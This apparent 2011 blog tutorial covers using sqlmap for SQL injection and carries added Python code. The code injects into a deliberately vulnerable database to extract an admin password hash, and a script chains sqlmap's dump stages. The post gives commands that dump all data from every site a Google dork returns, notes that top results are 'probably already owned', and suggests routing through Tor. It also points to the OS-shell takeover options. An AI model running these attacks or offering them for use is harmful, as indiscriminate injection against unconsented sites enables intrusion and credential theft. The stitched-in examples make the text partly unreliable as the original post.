Exploit-DB updates

Saturday, April 23, 2011

SQLMap - Basic / Intermediate usage

So I've recently been interested in web security a bit more, and while learning about SQL injection I came across a tool I found handy: sqlmap, an SQL injection and database takeover tool. sqlmap can handle a variety of database management systems such as MS SQL, MySQL, Oracle and so on. It supports five injection techniques: boolean-based blind, time-based blind, error-based, UNION query and stacked queries. It can retrieve tables along with their contents. It also has a built-in hash cracking function that attempts to crack recognised hashes with a dictionary-based attack. It has many other fun features such as Metasploit integration for privilege escalation and the use of Google dorks, which I will give an example of below.
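To make the first of those techniques concrete, here is an added example (mine, not part of the original post or of sqlmap itself) that does by hand what sqlmap automates: a constructed in-memory SQLite "shop" database with a deliberately unsafe prodID lookup, a boolean-based blind extraction that recovers the admin's password hash one character at a time from nothing but a true/false oracle, a UNION query that pulls the same row in a single request, and the parameterised query that stops both. The table names and values (products, ex_admin, the MD5 of "password") are made up for the demo, and SQLite's unicode() and substr() stand in for the DBMS-specific functions sqlmap would pick after fingerprinting.

```python
import sqlite3

# Constructed sample data for the demo (not from any real target).
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # md5("password")


def build_shop_db():
    """In-memory stand-in for the shop's database: a products table and an admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (prodID INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE ex_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", [(777, "widget"), (3030, "gadget")])
    conn.execute("INSERT INTO ex_admin VALUES (1, 'admin', ?)", (ADMIN_HASH,))
    conn.commit()
    return conn


def vulnerable_lookup(conn, prod_id):
    """Deliberately unsafe: the prodID value is concatenated straight into the SQL,
    which is exactly the flaw a ?prodID= page has when sqlmap reports it injectable."""
    sql = "SELECT name FROM products WHERE prodID = " + prod_id
    return conn.execute(sql).fetchall()


def page_says_true(conn, payload):
    """Boolean oracle: the 'page' shows a product only when the injected condition holds."""
    return len(vulnerable_lookup(conn, payload)) > 0


def blind_extract(conn, subquery, max_len=64):
    """Boolean-based blind extraction of one string-valued subquery.

    No data ever appears in the response; we learn it from true/false answers
    alone: first the length, then each character by binary search over its
    code point (printable ASCII 32..126), about seven requests per character."""
    length = 0
    for n in range(1, max_len + 1):
        if page_says_true(conn, f"777 AND length(({subquery}))={n}"):
            length = n
            break
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if page_says_true(conn, f"777 AND unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def union_extract(conn):
    """UNION query technique: one request, and the stolen row rides along in the result set."""
    rows = vulnerable_lookup(conn, "777 UNION SELECT username || ':' || password FROM ex_admin")
    return [row[0] for row in rows]


def safe_lookup(conn, prod_id):
    """The fix: bind the value as a parameter so it can never become part of the SQL."""
    return conn.execute("SELECT name FROM products WHERE prodID = ?", (prod_id,)).fetchall()


if __name__ == "__main__":
    db = build_shop_db()
    print("blind:", blind_extract(db, "SELECT password FROM ex_admin WHERE id=1"))
    print("union:", union_extract(db))
    print("safe :", safe_lookup(db, "777 UNION SELECT username FROM ex_admin"))
```

The blind path is why sqlmap's output crawls when only a boolean-based injection is available: every character costs several round trips, whereas the UNION path dumps a row per request. The time-based blind technique works the same way as the boolean one, except the oracle is a deliberate delay (a sleep or heavy query) rather than a change in the page content.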

This command will use a given Google dork and attempt to dump all available data from every result on the first page of Google results.


python sqlmap.py --dump-all -g "inurl:prodID=3030"

Now this could come in handy when pentesting, because you could use Google dorks to focus in on the target and spider it for specific pages or for more possible vulnerabilities. Or just use it for general dork fun. You can also choose a different page of Google results, as the default is the first page and those have probably already been owned. Also, so we can multitask and be notified when an SQL injection is found, we will add the --beep option.


python sqlmap.py --dump-all -g "inurl:prodID=3030" --gpage 3 --beep


Another possibility when going after a specific target in a pentest is something like this:


python sqlmap.py -g "site:'hakhub.tk' inurl:'/prodID='" --current-user --passwords

You can also specify exactly what to extract to save time, as you'll see. To start off we will fingerprint the back-end DBMS (-f) to get an idea of what we're dealing with. Then we will enumerate the databases and tables with verbosity, and proceed to dump the table we are interested in.


python sqlmap.py -u "www.example.com/shop/?prodID=777" -f


If all is well we'll proceed to issue the following commands. --batch automates the process by accepting the default answer to every prompt, and --eta shows the estimated time remaining:

python sqlmap.py -u "www.example.com/shop/?prodID=777" --dbs --tables -v 6 --batch --eta

python sqlmap.py -u "www.example.com/shop/?prodID=777" -D example_DB --tables --batch --eta

Now that we know example_DB has a table named ex_admin, we'll dump that table's contents.


python sqlmap.py -u "www.example.com/shop/?prodID=777" -D example_DB -T ex_admin --dump --batch --eta


If we wanted to do this via a proxy, we can use the --proxy option, as shown below. We'll assume you've got Tor and Polipo up and running, with Polipo listening on its default port, 8123.

python sqlmap.py -u "www.example.com/shop/?prodID=777" -D example_DB -T ex_admin --dump --batch --eta --proxy=http://127.0.0.1:8123
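The commands above are the steps of one procedure, so here is an added example (mine, not from the post or from sqlmap) that runs them in order from a single script. It assumes it is launched from inside a sqlmap checkout so that `python sqlmap.py` resolves, and it refuses a target written like `www.example.com/shop/prodID=777`: without the `?`, that URL carries no GET parameter for sqlmap to test, which otherwise only surfaces as a confusing error once the tool is already running. The target, database and table names are the post's own placeholders.

```python
import shlex
import subprocess
from urllib.parse import parse_qs, urlsplit

# Assumption: the script is run from inside a sqlmap checkout, so this resolves.
SQLMAP = ["python", "sqlmap.py"]


def check_target(url):
    """Normalise the target URL and make sure it carries at least one GET parameter.

    sqlmap tests the parameters in the query string; 'shop/prodID=777' has no
    query string at all (the '?' is missing), so there would be nothing to inject."""
    if "://" not in url:
        url = "http://" + url  # sqlmap assumes http when no scheme is given
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    if not params:
        raise ValueError(f"no GET parameter to test in {url!r}; expected something like ?prodID=777")
    return url


def stage_commands(url, db=None, table=None, proxy=None):
    """Build the argv for each stage of the fingerprint -> dbs -> tables -> dump walk.

    --batch answers every sqlmap prompt with its default so the run needs no
    babysitting; --eta shows the estimated time; --proxy is added only when asked."""
    url = check_target(url)
    common = ["-u", url, "--batch", "--eta"]
    if proxy:
        common.append("--proxy=" + proxy)
    stages = [("fingerprint", ["-f"]), ("databases", ["--dbs"])]
    if db:
        stages.append(("tables", ["-D", db, "--tables"]))
    if db and table:
        stages.append(("dump", ["-D", db, "-T", table, "--dump"]))
    return [(name, SQLMAP + common + opts) for name, opts in stages]


def run_stages(url, dry_run=True, **options):
    """Print (and, unless dry_run, execute) each stage; check=True stops at the first failure."""
    for name, argv in stage_commands(url, **options):
        print(f"[*] {name}: {shlex.join(argv)}")
        if not dry_run:
            subprocess.run(argv, check=True)


if __name__ == "__main__":
    # Dry run against the post's placeholder target, via the Tor/Polipo proxy from above.
    run_stages("www.example.com/shop/?prodID=777", db="example_DB", table="ex_admin",
               proxy="http://127.0.0.1:8123")
```

Running it with dry_run=True just prints the four command lines so they can be reviewed (and the scope confirmed) before anything touches the target; flip dry_run to False to execute them.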


You can also brute-force common table and column names with --common-tables and --common-columns, and play around with the OS takeover portion of the tool with --os-pwn (which uses Metasploit) and --os-shell.


There's a lot more this tool can do, so check out the following site to learn more: http://sqlmap.sourceforge.net/doc/README.html#ss1.2

You may also find this SQL cheat sheet useful: http://sql-tutorial.net/SQL-Cheat-Sheet.pdf

1 comment:

  1. Unable to find results for your Google dork expression.
    What do you think the bug is, man?
